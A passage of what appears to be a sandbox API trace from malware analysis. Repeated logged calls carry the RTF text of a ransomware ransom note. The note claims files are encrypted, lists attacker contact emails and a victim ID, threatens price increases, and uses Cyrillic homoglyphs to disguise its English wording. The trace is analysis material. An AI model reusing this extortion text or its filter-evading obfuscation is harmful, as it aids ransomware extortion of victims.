nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.565] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s 